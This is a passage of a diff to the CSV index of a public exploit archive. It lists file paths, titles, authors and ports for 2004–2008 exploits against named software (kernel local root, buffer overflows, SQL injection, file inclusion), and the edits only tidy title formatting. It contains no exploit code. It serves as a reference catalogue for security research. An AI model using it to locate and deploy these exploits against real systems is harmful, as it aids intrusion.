- 'mremap()' Validator (Proof of Concept) (1)",2004-02-18,"Christophe Devine",linux,local,0 +154,platforms/linux/local/154.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (Proof of Concept) (1)",2004-02-18,"Christophe Devine",linux,local,0 155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128 156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Windows 2000/XP)",2004-02-26,Rave,windows,remote,8080 157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389 158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x - (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21 159,platforms/windows/remote/159.c,"WFTPD Server 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21 -160,platforms/linux/local/160.c,"Linux Kernel 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Root Exploit (2)",2004-03-01,"Paul Starzetz",linux,local,0 +160,platforms/linux/local/160.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Local Root Exploit (2)",2004-03-01,"Paul Starzetz",linux,local,0 161,platforms/windows/dos/161.c,"Red Faction 1.20 - Server Reply Remote Buffer Overflow Exploit",2004-03-04,"Luigi Auriemma",windows,dos,0 163,platforms/windows/remote/163.pl,"Eudora 6.0.3 - Attachment Spoofing Exploit (Windows)",2004-03-19,anonymous,windows,remote,0 164,platforms/windows/remote/164.c,"Foxmail 5.0 - PunyLib.dll Remote Stack Overflow Exploit",2004-03-23,xfocus,windows,remote,0 @@ -281,7 +281,7 @@ id,file,description,date,author,platform,type,port 296,platforms/linux/remote/296.c,"XChat 1.8.0/2.0.8 socks5 - Remote Buffer Overflow Exploit",2004-05-05,vade79,linux,remote,0 297,platforms/windows/remote/297.c,"Sasser Worm ftpd Remote Buffer Overflow Exploit (port 5554)",2004-05-16,mandragore,windows,remote,5554 298,platforms/windows/dos/298.pl,"Emule 0.42e Remote Denial of Service Exploit",2004-05-16,"Rafel Ivgi",windows,dos,80 -299,platforms/windows/dos/299.c,"Symantec Multiple Firewall DNS Response Denial of Service",2004-05-16,houseofdabus,windows,dos,0 +299,platforms/windows/dos/299.c,"Symantec Multiple Firewall - DNS Response Denial of Service",2004-05-16,houseofdabus,windows,dos,0 300,platforms/multiple/remote/300.c,"CVS - Remote Entry Line Heap Overflow Root Exploit (Linux/FreeBSD)",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401 301,platforms/solaris/remote/301.c,"CVS - Remote Entry Line Root Heap Overflow Exploit",2004-06-25,anonymous,solaris,remote,2401 302,platforms/unix/local/302.c,"UNIX 7th Edition /bin/mkdir Local Buffer Overflow Exploit",2004-06-25,anonymous,unix,local,0 @@ -332,7 +332,7 @@ id,file,description,date,author,platform,type,port 355,platforms/windows/local/355.c,"Microsoft Windows 2000 - Utility Manager (All-In-One) Exploit (MS04-019)",2004-07-20,kralor,windows,local,0 356,platforms/windows/dos/356.c,"OverByte ICS FTP Server Remote Denial of Service Exploit",2004-07-20,ATmaCA,windows,dos,0 357,platforms/windows/dos/357.c,"Medal of Honor Remote Buffer Overflow",2004-07-20,"Luigi Auriemma",windows,dos,0 -358,platforms/hardware/dos/358.txt,"Lexmark Multiple HTTP Servers Denial of Service",2004-07-22,"Peter Kruse",hardware,dos,0 +358,platforms/hardware/dos/358.txt,"Lexmark Multiple HTTP Servers - Denial of Service",2004-07-22,"Peter Kruse",hardware,dos,0 359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta (drcatd) Remote Root Exploit",2004-07-22,Taif,linux,remote,3535 360,platforms/multiple/dos/360.pl,"Apache HTTPd - Arbitrary Long HTTP Headers DoS (Perl)",2004-07-22,bkbll,multiple,dos,80 361,platforms/windows/remote/361.txt,"Flash FTP Server Directory Traversal",2004-07-22,CoolICE,windows,remote,0 @@ -387,7 +387,7 @@ id,file,description,date,author,platform,type,port 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",linux,remote,0 417,platforms/linux/local/417.c,"SquirrelMail - (chpasswd) Local Root Bruteforce Exploit",2004-08-25,Bytes,linux,local,0 418,platforms/windows/remote/418.c,"Winamp 5.04 - Skin File (.wsz) Remote Code Execution Exploit",2004-08-25,"Petrol Designs",windows,remote,0 -419,platforms/windows/dos/419.pl,"BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit",2004-08-26,"GulfTech Security",windows,dos,0 +419,platforms/windows/dos/419.pl,"BadBlue 2.52 Web Server - Multiple Connections Denial of Service Exploit",2004-08-26,"GulfTech Security",windows,dos,0 420,platforms/win_x86/dos/420.java,"Bird Chat 1.61 - Denial of Service",2004-08-26,"Donato Ferrante",win_x86,dos,0 421,platforms/windows/remote/421.c,"Gaucho 1.4 Mail Client Buffer Overflow",2004-08-27,"Tan Chew Keong",windows,remote,0 422,platforms/windows/dos/422.c,"Painkiller 1.3.1 - Denial of Service Exploit",2004-08-27,"Luigi Auriemma",windows,dos,0 @@ -530,14 +530,14 @@ id,file,description,date,author,platform,type,port 682,platforms/windows/dos/682.c,"Codename Eagle 1.42 - Socket Unreacheable DoS Exploit",2004-12-13,"Luigi Auriemma",windows,dos,0 683,platforms/windows/dos/683.c,"Lithtech Engine (new protocol) - Socket Unreacheable DoS",2004-12-13,"Luigi Auriemma",windows,dos,0 684,platforms/linux/local/684.c,"TipxD 1.1.1 - Local Format String (not setuid)",2004-12-14,CoKi,linux,local,0 -685,platforms/linux/dos/685.c,"Linux Kernel 2.4.28 / <= 2.6.9 - scm_send Local DoS Exploit",2004-12-14,"Paul Starzetz",linux,dos,0 +685,platforms/linux/dos/685.c,"Linux Kernel 2.4.28 / 2.6.9 - scm_send Local DoS Exploit",2004-12-14,"Paul Starzetz",linux,dos,0 686,platforms/linux/dos/686.c,"Linux Kernel 2.6.9 / 2.4.22-28 - 'igmp.c' Local Denial of Service Exploit",2004-12-14,"Paul Starzetz",linux,dos,0 687,platforms/windows/dos/687.c,"OpenText FirstClass 8.0 - HTTP Daemon /Search Remote DoS",2004-12-15,dila,windows,dos,0 688,platforms/hardware/dos/688.c,"Ricoh Aficio 450/455 PCL 5e Printer ICMP Denial of Service Exploit",2004-12-15,x90c,hardware,dos,0 689,platforms/multiple/remote/689.pl,"wget 1.9 - Directory Traversal Exploit",2004-12-15,jjminar,multiple,remote,0 -690,platforms/linux/dos/690.c,"Linux Kernel 2.6.9 / <= 2.4.28 - vc_resize int Local Overflow Exploit",2004-12-16,"Georgi Guninski",linux,dos,0 -691,platforms/linux/dos/691.c,"Linux Kernel 2.6.9 / <= 2.4.28 - Memory Leak Local DoS",2004-12-16,"Georgi Guninski",linux,dos,0 -692,platforms/linux/dos/692.c,"Linux Kernel 2.6.9 / <= 2.4.28 - ip_options_get Local Overflow",2004-12-16,"Georgi Guninski",linux,dos,0 +690,platforms/linux/dos/690.c,"Linux Kernel 2.4.28 / 2.6.9 - vc_resize int Local Overflow Exploit",2004-12-16,"Georgi Guninski",linux,dos,0 +691,platforms/linux/dos/691.c,"Linux Kernel 2.4.28 / 2.6.9 - Memory Leak Local DoS",2004-12-16,"Georgi Guninski",linux,dos,0 +692,platforms/linux/dos/692.c,"Linux Kernel 2.4.28 / 2.6.9 - ip_options_get Local Overflow",2004-12-16,"Georgi Guninski",linux,dos,0 693,platforms/windows/remote/693.c,"Ability Server 2.34 - Remote APPE Buffer Overflow Exploit",2004-12-16,darkeagle,windows,remote,21 694,platforms/windows/local/694.c,"WinRAR 3.4.1 - Corrupt ZIP File PoC",2004-12-16,"Vafa Khoshaein",windows,local,0 695,platforms/linux/local/695.c,"Cscope 15.5 - Symlink Exploit",2004-12-17,Gangstuck,linux,local,0 @@ -1163,9 +1163,9 @@ id,file,description,date,author,platform,type,port 1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6.0 - (mshtml.dll div) Denial of Service Exploit",2005-12-29,rgod,windows,dos,0 1395,platforms/php/webapps/1395.php,"phpDocumentor 1.3.0 rc4 - Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0 1396,platforms/windows/dos/1396.cpp,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (cpp)",2005-12-29,Lympex,windows,dos,0 -1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 / <= 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Local Root Exploit",2005-12-30,alert7,linux,local,0 +1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Local Root Exploit",2005-12-30,alert7,linux,local,0 1398,platforms/php/webapps/1398.pl,"CubeCart 3.0.6 - Remote Command Execution Exploit",2005-12-30,cijfer,php,webapps,0 -1399,platforms/asp/webapps/1399.txt,"WebWiz Products 1.0 / <= 3.06 - Login Bypass SQL Injection Exploits",2005-12-30,DevilBox,asp,webapps,0 +1399,platforms/asp/webapps/1399.txt,"WebWiz Products 1.0 / 3.06 - Login Bypass SQL Injection Exploits",2005-12-30,DevilBox,asp,webapps,0 1400,platforms/php/webapps/1400.pl,"CuteNews 1.4.1 - (categories.mdu) Remote Command Execution Exploit",2006-01-01,cijfer,php,webapps,0 1401,platforms/php/webapps/1401.pl,"Valdersoft Shopping Cart 3.0 - Remote Command Execution Exploit",2006-01-03,cijfer,php,webapps,0 1402,platforms/sco/local/1402.c,"SCO Openserver 5.0.7 - (termsh) Local Privilege Escalation Exploit",2006-01-03,prdelka,sco,local,0 @@ -1419,7 +1419,7 @@ id,file,description,date,author,platform,type,port 1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) - Remote File Inclusion Exploit",2006-04-18,Hessam-x,php,webapps,0 1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution Exploit",2006-04-18,FOX_MULDER,php,webapps,0 1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution Exploit",2006-04-19,rgod,php,webapps,0 -1698,platforms/php/webapps/1698.php,"Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0 +1698,platforms/php/webapps/1698.php,"Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure / Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0 1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote Inclusion",2006-04-19,"GroundZero Security",php,webapps,0 1700,platforms/asp/webapps/1700.pl,"ASPSitem 1.83 - (Haberler.asp) SQL Injection Exploit",2006-04-19,nukedx,asp,webapps,0 1701,platforms/php/webapps/1701.php,"PHPSurveyor 0.995 - (surveyid) Remote Command Execution Exploit",2006-04-20,rgod,php,webapps,0 @@ -1456,7 +1456,7 @@ id,file,description,date,author,platform,type,port 1733,platforms/php/webapps/1733.pl,"Invision Power Board 2.1.5 - (from_contact) SQL Injection Exploit",2006-05-01,"Ykstortion Security",php,webapps,0 1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - (help_file) Remote Command Execution",2006-05-02,rgod,php,webapps,0 1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server 4.1.2 - (parse_xml.cgi) Code Execution Exploit",2003-02-24,FOX_MULDER,osx,remote,0 -1740,platforms/php/webapps/1740.pl,"Fast Click 1.1.3 / <= 2.3.8 - (show.php) Remote File Inclusion Exploit",2006-05-02,R@1D3N,php,webapps,0 +1740,platforms/php/webapps/1740.pl,"Fast Click 1.1.3 / 2.3.8 - (show.php) Remote File Inclusion Exploit",2006-05-02,R@1D3N,php,webapps,0 1741,platforms/linux/remote/1741.c,"MySQL 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit",2006-05-02,"Stefano Di Paola",linux,remote,3306 1742,platforms/linux/remote/1742.c,"MySQL 4.1.18 / 5.0.20 - Local/Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0 1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - (APPE) Remote Buffer Overflow PoC",2006-05-03,"Jerome Athias",windows,dos,0 @@ -2059,7 +2059,7 @@ id,file,description,date,author,platform,type,port 2362,platforms/asp/webapps/2362.txt,"TualBLOG 1.0 - (icerikno) SQL Injection",2006-09-13,RMx,asp,webapps,0 2363,platforms/php/webapps/2363.tt,"Magic News Pro 1.0.3 - (script_path) Remote File Inclusion",2006-09-13,"Saudi Hackrz",php,webapps,0 2364,platforms/php/webapps/2364.txt,"KnowledgeBuilder 2.2 - (visEdit_root) Remote File Inclusion",2006-09-13,igi,php,webapps,0 -2365,platforms/php/webapps/2365.txt,"Newsscript 0.5 - Remote and Local File Inclusion",2006-09-13,"Daftrix Security",php,webapps,0 +2365,platforms/php/webapps/2365.txt,"Newsscript 0.5 - Remote File Inclusion / Local File Inclusion",2006-09-13,"Daftrix Security",php,webapps,0 2366,platforms/php/webapps/2366.txt,"phpQuiz 0.1 - (pagename) Remote File Inclusion",2006-09-14,Solpot,php,webapps,0 2367,platforms/php/webapps/2367.txt,"Mambo com_serverstat Component 0.4.4 File Include",2006-09-14,"Mehmet Ince",php,webapps,0 2368,platforms/php/webapps/2368.txt,"TeamCal Pro 2.8.001 - (app_root) Remote File Inclusion",2006-09-14,PSYCH@,php,webapps,0 @@ -2220,7 +2220,7 @@ id,file,description,date,author,platform,type,port 2524,platforms/bsd/dos/2524.c,"FreeBSD 5.4 / 6.0 - (ptrace PT_LWPINFO) Local Denial of Service Exploit",2006-10-12,kokanin,bsd,dos,0 2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod 0.1.2 - Remote File Inclusion Exploit",2006-10-12,"Nima Salehi",php,webapps,0 2526,platforms/php/webapps/2526.txt,"phpht Topsites (common.php) Remote File Inclusion",2006-10-12,"Mehmet Ince",php,webapps,0 -2527,platforms/php/webapps/2527.c,"Invision Gallery 2.0.7 ReadFile() & SQL Injection Exploit (linux)",2006-10-12,ShadOS,php,webapps,0 +2527,platforms/php/webapps/2527.c,"Invision Gallery 2.0.7 ReadFile() & SQL Injection Exploit (Linux)",2006-10-12,ShadOS,php,webapps,0 2528,platforms/php/webapps/2528.txt,"miniBB keyword_replacer 1.0 - (pathToFiles) File Include",2006-10-12,Kw3[R]Ln,php,webapps,0 2529,platforms/php/webapps/2529.txt,"AFGB GUESTBOOK 2.2 - (Htmls) Remote File Inclusion",2006-10-12,mdx,php,webapps,0 2530,platforms/windows/remote/2530.py,"BulletProof FTP Client 2.45 - Remote Buffer Overflow Exploit (PoC)",2006-10-12,h07,windows,remote,0 @@ -4042,7 +4042,7 @@ id,file,description,date,author,platform,type,port 4393,platforms/windows/remote/4393.html,"Microsoft Visual Studio 6.0 - (PDWizard.ocx) Remote Command Execution",2007-09-11,shinnai,windows,remote,0 4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - (VBTOVSI.DLL 1.0.0.0) File Overwrite Exploit",2007-09-11,shinnai,windows,remote,0 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - (root_path) Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0 -4396,platforms/php/webapps/4396.txt,"X-Cart ? Multiple Remote File Inclusion",2007-09-11,aLiiF,php,webapps,0 +4396,platforms/php/webapps/4396.txt,"X-Cart - Multiple Remote File Inclusion",2007-09-11,aLiiF,php,webapps,0 4397,platforms/php/webapps/4397.rb,"WordPress Multiple Versions - Pwnpress Exploitation Tookit (0.2pub)",2007-09-14,"Lance M. Havok",php,webapps,0 4398,platforms/windows/remote/4398.html,"Microsoft SQL Server Distributed Management Objects BoF Exploit",2007-09-12,96sysim,windows,remote,0 4399,platforms/multiple/remote/4399.html,"Apple Quicktime (Multiple Browsers) Command Execution PoC (0Day)",2007-09-12,pdp,multiple,remote,0 @@ -4329,7 +4329,7 @@ id,file,description,date,author,platform,type,port 4682,platforms/windows/dos/4682.c,"Windows Media Player AIFF Divide By Zero Exception DoS PoC",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0 4683,platforms/windows/dos/4683.py,"RealPlayer 11 Malformed AU File Denial of Service Exploit",2007-12-01,NtWaK0,windows,dos,0 4684,platforms/php/webapps/4684.txt,"tellmatic 1.0.7 - Multiple Remote File Inclusion",2007-12-01,ShAy6oOoN,php,webapps,0 -4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Remote / Local File Inclusion",2007-12-01,Crackers_Child,php,webapps,0 +4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion",2007-12-01,Crackers_Child,php,webapps,0 4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0 4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 Active.asp SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0 4688,platforms/windows/dos/4688.html,"VLC 0.86 < 0.86d ActiveX Remote Bad Pointer Initialization PoC",2007-12-04,"Ricardo Narvaja",windows,dos,0 @@ -4747,7 +4747,7 @@ id,file,description,date,author,platform,type,port 5107,platforms/windows/local/5107.c,"Microsoft Office 2003 - (.wps) Stack Overflow Exploit (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0 5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 BETA - (language) Local File Inclusion",2008-02-13,GoLd_M,php,webapps,0 5109,platforms/php/webapps/5109.txt,"Joomla Component xfaq 1.2 - (aid) SQL Injection",2008-02-13,S@BUN,php,webapps,0 -5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 QTPlugin.ocx Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié ",windows,dos,0 +5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 - QTPlugin.ocx Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié ",windows,dos,0 5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module - SEH Overwrite Exploit",2008-02-13,Elazar,windows,remote,0 5112,platforms/jsp/webapps/5112.txt,"jspwiki 2.4.104 / 2.5.139 - Multiple Vulnerabilities",2008-02-13,"BugSec LTD",jsp,webapps,0 5113,platforms/hardware/remote/5113.txt,"Philips VOIP841 - (Firmware 1.0.4.800) Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote,0 @@ -4758,7 +4758,7 @@ id,file,description,date,author,platform,type,port 5118,platforms/php/webapps/5118.txt,"Joomla Component MCQuiz 0.9 Final (tid) SQL Injection",2008-02-14,S@BUN,php,webapps,0 5119,platforms/php/webapps/5119.txt,"Joomla Component Quiz 0.81 - (tid) SQL Injection",2008-02-14,S@BUN,php,webapps,0 5120,platforms/php/webapps/5120.pl,"Joomla Component mediaslide (albumnum) Blind SQL Injection Exploit",2008-02-14,Inphex,php,webapps,0 -5121,platforms/php/webapps/5121.txt,"LookStrike Lan Manager 0.9 - Remote / Local File Inclusion",2008-02-14,MhZ91,php,webapps,0 +5121,platforms/php/webapps/5121.txt,"LookStrike Lan Manager 0.9 - Remote File Inclusion / Local File Inclusion",2008-02-14,MhZ91,php,webapps,0 5122,platforms/windows/dos/5122.pl,"Rosoft Media Player 4.1.8 M3U File Remote Buffer Overflow PoC",2008-02-14,securfrog,windows,dos,0 5123,platforms/php/webapps/5123.txt,"Scribe 0.2 - (index.php page) Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 5124,platforms/php/webapps/5124.txt,"freePHPgallery 0.6 Cookie Local File Inclusion",2008-02-14,MhZ91,php,webapps,0 @@ -5266,7 +5266,7 @@ id,file,description,date,author,platform,type,port 5638,platforms/php/webapps/5638.txt,"How2ASP.net Webboard 4.1 - SQL Injection",2008-05-17,"CWH Underground",php,webapps,0 5639,platforms/php/webapps/5639.pl,"FicHive 1.0 - (category) Remote Blind SQL Injection Exploit",2008-05-17,His0k4,php,webapps,0 5640,platforms/php/webapps/5640.py,"Smeego 1.0 - (Cookie lang) Local File Inclusion Exploit",2008-05-17,0in,php,webapps,0 -5641,platforms/php/webapps/5641.txt,"CMS WebManager-Pro Multiple SQL Injection",2008-05-18,dun,php,webapps,0 +5641,platforms/php/webapps/5641.txt,"CMS WebManager-Pro - Multiple SQL Injection",2008-05-18,dun,php,webapps,0 5642,platforms/php/webapps/5642.txt,"TAGWORX.CMS - Multiple SQL Injection",2008-05-18,dun,php,webapps,0 5643,platforms/php/webapps/5643.txt,"Ajax framework (lang) Local File Inclusion",2008-05-18,dun,php,webapps,0 5644,platforms/php/webapps/5644.txt,"lulieblog 1.2 - Multiple Vulnerabilities",2008-05-18,Cod3rZ,php,webapps,0 @@ -5414,7 +5414,7 @@ id,file,description,date,author,platform,type,port 5789,platforms/php/webapps/5789.pl,"JAMM CMS (id) Remote Blind SQL Injection Exploit",2008-06-11,anonymous,php,webapps,0 5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC validation error Remote Authentication Bypass Exploit",2008-06-12,"Maurizio Agazzini",multiple,remote,161 5791,platforms/php/webapps/5791.txt,"gravity board x 2.0 beta - (SQL/XSS) Multiple Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 -5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC Multiple Local File Inclusion",2008-06-12,"CWH Underground",php,webapps,0 +5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC - Multiple Local File Inclusion",2008-06-12,"CWH Underground",php,webapps,0 5793,platforms/windows/remote/5793.html,"muvee autoProducer 6.1 - (TextOut.dll) ActiveX Remote BoF Exploit",2008-06-12,Nine:Situations:Group,windows,remote,0 5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 - (results.php) SQL Injection Exploit",2008-06-12,anonymous,php,webapps,0 5795,platforms/windows/remote/5795.html,"XChat 2.8.7b (URI Handler) Remote Code Execution Exploit (ie6/ie7)",2008-06-13,securfrog,windows,remote,0 @@ -5703,7 +5703,7 @@ id,file,description,date,author,platform,type,port 6086,platforms/php/webapps/6086.txt,"Joomla Component DT Register SQL Injection",2008-07-16,His0k4,php,webapps,0 6087,platforms/php/webapps/6087.txt,"AlstraSoft Affiliate Network Pro (pgm) SQL Injection",2008-07-16,"Hussin X",php,webapps,0 6088,platforms/php/webapps/6088.txt,"tplSoccerSite 1.0 - Multiple SQL Injection",2008-07-16,Mr.SQL,php,webapps,0 -6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution and Denial of Service Exploit",2008-07-17,kingcope,windows,remote,80 +6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service Exploit",2008-07-17,kingcope,windows,remote,80 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class ActiveX Control Buffer Overflow PoC",2008-07-17,"Guido Landi",windows,dos,0 6091,platforms/php/webapps/6091.txt,"phpHoo3 <= 5.2.6 - (phpHoo3.php viewCat) SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 6092,platforms/php/webapps/6092.txt,"AlstraSoft Video Share Enterprise 4.5.1 - (UID) SQL Injection",2008-07-17,"Hussin X",php,webapps,0 @@ -6316,7 +6316,7 @@ id,file,description,date,author,platform,type,port 6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 - (sug_cat.php parent_id) SQL Injection",2008-10-13,d3v1l,php,webapps,0 6747,platforms/php/webapps/6747.php,"WP Comment Remix 1.4.3 - SQL Injection Exploit",2008-10-14,g30rg3_x,php,webapps,0 6748,platforms/php/webapps/6748.txt,"XOOPS Module xhresim - (index.php no) SQL Injection",2008-10-14,EcHoLL,php,webapps,0 -6749,platforms/php/webapps/6749.php,"Nuked-klaN 1.7.7 / <= SP4.4 - Multiple Vulnerabilities",2008-10-14,"Charles Fol",php,webapps,0 +6749,platforms/php/webapps/6749.php,"Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities",2008-10-14,"Charles Fol",php,webapps,0 6750,platforms/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",hardware,remote,0 6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - (IP) Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0 6752,platforms/windows/dos/6752.pl,"Eserv 3.x FTP Server (ABOR) Remote Stack Overflow PoC",2008-10-14,LiquidWorm,windows,dos,0 @@ -6329,7 +6329,7 @@ id,file,description,date,author,platform,type,port 6759,platforms/php/webapps/6759.txt,"mystats - (hits.php) Multiple Vulnerabilities",2008-10-15,JosS,php,webapps,0 6760,platforms/php/webapps/6760.txt,"myEvent 1.6 - (viewevent.php) SQL Injection",2008-10-15,JosS,php,webapps,0 6761,platforms/windows/dos/6761.html,"Hummingbird 13.0 - ActiveX Remote Buffer Overflow PoC",2008-10-16,"Thomas Pollet",windows,dos,0 -6762,platforms/php/webapps/6762.txt,"CafeEngine Multiple SQL Injection",2008-10-16,0xFFFFFF,php,webapps,0 +6762,platforms/php/webapps/6762.txt,"CafeEngine - Multiple SQL Injection",2008-10-16,0xFFFFFF,php,webapps,0 6763,platforms/php/webapps/6763.txt,"Mosaic Commerce (category.php cid) SQL Injection",2008-10-16,"Ali Abbasi",php,webapps,0 6764,platforms/php/webapps/6764.php,"Mic_blog 0.0.3 - (SQL Injection/Privilege Escalation) Remote Exploit",2008-10-16,StAkeR,php,webapps,0 6765,platforms/php/webapps/6765.txt,"IP Reg 0.4 - Multiple SQL Injection",2008-10-16,JosS,php,webapps,0 @@ -6463,7 +6463,7 @@ id,file,description,date,author,platform,type,port 6896,platforms/php/webapps/6896.txt,"Logz podcast CMS 1.3.1 - (add_url.php art) SQL Injection",2008-10-31,ZoRLu,php,webapps,0 6897,platforms/php/webapps/6897.txt,"cpanel 11.x - XSS / Local File Inclusion",2008-10-31,"Khashayar Fereidani",php,webapps,0 6898,platforms/php/webapps/6898.txt,"U-Mail Webmail 4.91 - (edit.php) Arbitrary File Write",2008-10-31,"Shennan Wang",php,webapps,0 -6899,platforms/hardware/remote/6899.txt,"A-Link WL54AP3 and WL54AP2 - CSRF + XSS",2008-10-31,"Henri Lindberg",hardware,remote,0 +6899,platforms/hardware/remote/6899.txt,"A-Link WL54AP3 and WL54AP2 - CSRF / XSS",2008-10-31,"Henri Lindberg",hardware,remote,0 6900,platforms/php/webapps/6900.txt,"Absolute News Manager 5.1 Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6901,platforms/php/webapps/6901.txt,"Absolute News Feed 1.0 - Remote Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6902,platforms/php/webapps/6902.txt,"Absolute FAQ Manager 6.0 Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 @@ -6679,7 +6679,7 @@ id,file,description,date,author,platform,type,port 7119,platforms/php/webapps/7119.php,"Discuz! 6.x/7.x - Remote Code Execution Exploit",2008-11-14,80vul,php,webapps,0 7120,platforms/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 - (Auth Bypass) SQL Injection",2008-11-14,R3d-D3V!L,asp,webapps,0 7121,platforms/php/webapps/7121.pl,"SlimCMS 1.0.0 - (edit.php) SQL Injection Exploit",2008-11-14,StAkeR,php,webapps,0 -7122,platforms/php/webapps/7122.txt,"GS Real Estate Portal Multiple SQL Injection",2008-11-14,InjEctOr5,php,webapps,0 +7122,platforms/php/webapps/7122.txt,"GS Real Estate Portal - Multiple SQL Injection",2008-11-14,InjEctOr5,php,webapps,0 7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - (Auth Bypass) SQL Injection",2008-11-14,ZoRLu,php,webapps,0 7124,platforms/php/webapps/7124.txt,"turnkeyforms Text Link Sales (id) XSS/SQL Injection",2008-11-14,ZoRLu,php,webapps,0 7125,platforms/windows/remote/7125.txt,"SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068)",2008-11-14,"Andres Tarasco",windows,remote,0 @@ -6689,7 +6689,7 @@ id,file,description,date,author,platform,type,port 7130,platforms/php/webapps/7130.php,"Minigal b13 - (index.php list) Remote File Disclosure Exploit",2008-11-15,"Alfons Luja",php,webapps,0 7131,platforms/php/webapps/7131.txt,"yahoo answers (id) SQL Injection",2008-11-16,snakespc,php,webapps,0 7132,platforms/windows/remote/7132.py,"Microsoft Windows Server 2000/2003 - Code Execution Exploit (MS08-067)",2008-11-16,"Debasis Mohanty",windows,remote,445 -7133,platforms/php/webapps/7133.txt,"FloSites Blog Multiple SQL Injection",2008-11-16,Vrs-hCk,php,webapps,0 +7133,platforms/php/webapps/7133.txt,"FloSites Blog - Multiple SQL Injection",2008-11-16,Vrs-hCk,php,webapps,0 7134,platforms/php/webapps/7134.txt,"phpstore Wholesale (track.php?id) SQL Injection",2008-11-16,"Hussin X",php,webapps,0 7135,platforms/windows/local/7135.htm,"Opera 9.62 file:// Local Heap Overflow Exploit",2008-11-17,"Guido Landi",windows,local,0 7136,platforms/php/webapps/7136.txt,"mxCamArchive 2.2 Bypass Config Download",2008-11-17,ahmadbady,php,webapps,0 @@ -6899,7 +6899,7 @@ id,file,description,date,author,platform,type,port 7354,platforms/php/webapps/7354.txt,"Tizag Countdown Creator .v.3 Insecure Upload",2008-12-05,ahmadbady,php,webapps,0 7355,platforms/windows/remote/7355.txt,"NULL FTP Server 1.1.0.7 - SITE Parameters Command Injection",2008-12-05,"Tan Chew Keong",windows,remote,0 7356,platforms/asp/webapps/7356.txt,"asp autodealer - (SQL/DD) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,asp,webapps,0 